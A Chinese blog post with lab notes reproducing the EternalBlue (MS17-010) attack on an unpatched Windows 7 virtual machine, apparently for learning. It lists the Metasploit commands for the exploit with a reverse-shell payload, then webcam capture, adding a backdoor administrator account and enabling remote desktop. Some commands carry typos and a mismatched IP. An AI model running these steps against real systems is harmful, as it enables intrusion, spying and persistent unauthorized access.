永恒之蓝复现(笔记)

最新推荐文章于 2023-07-30 14:16:05 发布
最新推荐文章于 2023-07-30 14:16:05 发布
阅读量318 收藏 1
点赞数 5
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41862216/article/details/117420033
版权

本机ip:192.168.116.128(kali)

靶机ip:192.168.116.129(win7. x64) 

##禁止转载-------所有权:枕书

准备工作:

准备一台kali主机和一台win7主机,前者负责攻击,后者为靶机,靶机需为win7系统并且没有安装补丁(即需要开启445端口)

查看靶机ip

打开kali,通过nmap扫描同网段下的所有主机

nmap 192.168.116.1/24 //扫描主机的端口开放情况

 

启动msfconsole工具

msfconsole //启动命令

msfconsole

搜索ms17_010漏洞,本次使用第三条进行测试(状态为yes的都可使用)

search ms17_010

使用永恒之蓝漏洞,使用use 名称命令进行使用。

use exploit/windows/smb/ms17_010_eternalblue

显示所需要的参数

show options

设置目标主机ip

set rhost 192.168.116.129

设置攻击载体(设置该载体进行攻击成功后我们可以使用这个模块自带的各种攻击模块)。

set payload windows/x64/meterpreter/reverse_tcp

设置本机ip

set lhost 192.168.1.128

查看设置的参数,以确保参数正确

show options

执行漏洞(当出现以下情况,说明成绩已经成功,接下来我们就可以进行文件的上传下载,截取屏幕,获取密码,使用摄像头拍照, 远程桌面连接等操作。)

run

成功渗透后输入命令

//截取屏幕

screenshot

//用摄像头拍照

webcam_snap

//用摄像头开视频

webcam_stream

//创建新用户Hack

netuser Hack 123456 /add

//将用户Hack添加至管理员组

netlocalgroup administrators Hack /add

开启远程桌面功能

REGADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /vfDenyTSConnections /t REG_DWORD /d 0 /f

kali 远程桌面连接Win7

rdesktop192.168.23.133:3389

 

枕书
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
永恒之蓝漏洞复现过程
hhf小菜鸡的博客
05-12 666
漏洞复现过程 1.准备一台kali虚拟机,一台windows7 2.打开kali,查看kali的IP地址,命令:ifconfig 3.知道kali的IP地址为:192.168.43.116之后使用kali自带的nmap网络扫描工具扫描192.168.43.0网段下存活的主机,命令:nmap -sS 192.168.43.0/24 在这里我选择了IP地址为192.168.43.67的主机作为我的漏洞利用对象,因为我觉得他的主机端口开放的最多,成功的几率比较大,而且它的445端口也是开放的 4.接下来可以看看这
Windows 7 ms17-010永恒之蓝漏洞复现
m0_51600840的博客
07-04 2186
复现ms17-010漏洞环境:1.进入框架:msfconsole 2.使用search命令查找相关漏洞: search ms17-010 3.使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 4.设置本机地址:set lhost 192.168.238.130(输入自己本机的IP地址即kali虚拟机地址) 5. 设置靶机地址:set rhost 192.168.238.128(输入靶机的IP地址即Windows 7虚拟机地址) 注意靶机地址和攻
永恒之蓝漏洞复现ms17_010
baijiaofei的博客
11-03 724
!!!!最最最简单的ms17-010漏洞复现,一分钟搞定。
永恒之蓝--Windows7
chang113的博客
06-20 1171
永恒之蓝--Windows7
永恒之蓝复现(ms17-010)
weixin_64311421的博客
07-30 378
永恒之蓝漏洞
永恒之蓝复现kaliwin7
最新发布
07-19
### 恒之蓝漏洞复现:Kali Linux 攻击 Windows 7 #### 实验背景及目的 “永恒之蓝”(EternalBlue)是一种针对 Windows 操作系统的严重漏洞,该漏洞允许攻击者在无需用户交互的情况下实现远程代码执行。本次实验...
渗透基础笔记+作业(永恒之蓝复现
09-08
渗透测试是一种重要的网络安全评估方法...对于特定的漏洞如“永恒之蓝”,了解其工作原理和复现过程,对于提高网络安全防护至关重要。同时,测试报告的编写也是整个过程的成果展示,为防御者提供了改进安全策略的依据。
远程客户端连接Kafka
yeshu2780的博客
11-25 8225
一、原因描述 安装好Kafka(服务端ip为192.168.116.128(本地虚拟机)),在Linux服务器上使用kafka-console-consumer和kafka-console-producer,进行生产者和消费者测试,能进行正常的接发消息。但是通过远程客户端的作为生产者,无法与kafka服务端建立连接。 二、问题排查 1、排查是不是服务器的防火墙原因,导致服务器的9092端口不能被window连接上,在window上执行telnet 192.168.116.128 9...
永恒之蓝漏洞利用及攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
针对windows server 2008R2 复现永恒之蓝漏洞(命令行操作)
m0_50505929的博客
03-31 2494
kali渗透windows server 2008 R2 永恒之蓝 linux:kali Linux windows:windows server 2008 R2 确认进入kali的root 进入kali的msf:msfconsole 使用可用端口模块:use auxiliary/scanner/smb/smb_version 查看需要设置的参数:show options yes为需要设置的参数,no无需设置 设置目标主机地址:set rhosts 192.168.205.150 设置线程数:set
永恒之蓝 ——漏洞攻击
m0_56679835的博客
03-31 403
永恒之蓝 ——漏洞攻击 永恒之蓝——漏洞攻击(命令行操作) 1.查看kali的IP地址:ifconfig 2.查看Windows的IP地址:ipconfig 3.用kali ping Windows 的主机 4.输入linux命令 su root 5.输入msfconsole 6.使用攻击武器:use auxiliary/scanner/smb/smb/_version 7.选择IP进行攻击 set rhosts 192.168.140.128 8.运行 run 9.定义线程 :set threads 20
MS17_010(永恒之蓝)漏洞复现
weixin_45253622的博客
03-06 445
MS17_010(永恒之蓝)漏洞复现 kali控制台输入:msfdb init 初始化msf数据库 msfconsole打开msf 使用msf自带端口扫描工具扫描目标主机 发现开放445端口,我们扫描ms17_010 使用辅助模块auxiliary先进行扫描是否存在漏洞 输入命令:use auxiliary/scanner/smb/smb_ms17_010 并查看配置信息 设置目标主机 run 发现存在漏洞 选择漏洞攻击模块: use exploit/windows/smb/ms17_0
永恒之蓝——windows server 2003 漏洞
菜鸟-传奇
07-07 4131
永恒之蓝——windows server 2003 漏洞 作业参考 作业参考2 一、永恒之蓝简述: 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构...
永恒之蓝复现-网络安全新手的兴趣以及小知识
Mjj567的博客
03-22 456
复现永恒之蓝
mysql虚拟机远程链接_Navicat远程连接虚拟机Mysql的时候报错mysql 1130的解决方法
weixin_39611389的博客
01-28 331
闲来无事,在自己笔记本上安装了虚拟机并且配置了nginx+php+mysql,这些东西都已顺利搭建,唯一的一点就见表的时候不方便,所以用navicta工具连接自己虚拟机的mysql,结果出现了如下问题:ERROR 1130: Host '192.168.116.128' is not allowed to connect to this MySQL server(不允许连接到MySQL服务器,也就...
永恒之蓝(ms17-010)漏洞简介及复现
m0_50406447的博客
07-26 3161
一、永恒之蓝简介与危害 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 二、漏洞描述 Windows操作系统的SMBv1协议中存在安全漏洞。攻击者会扫描开放445文
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值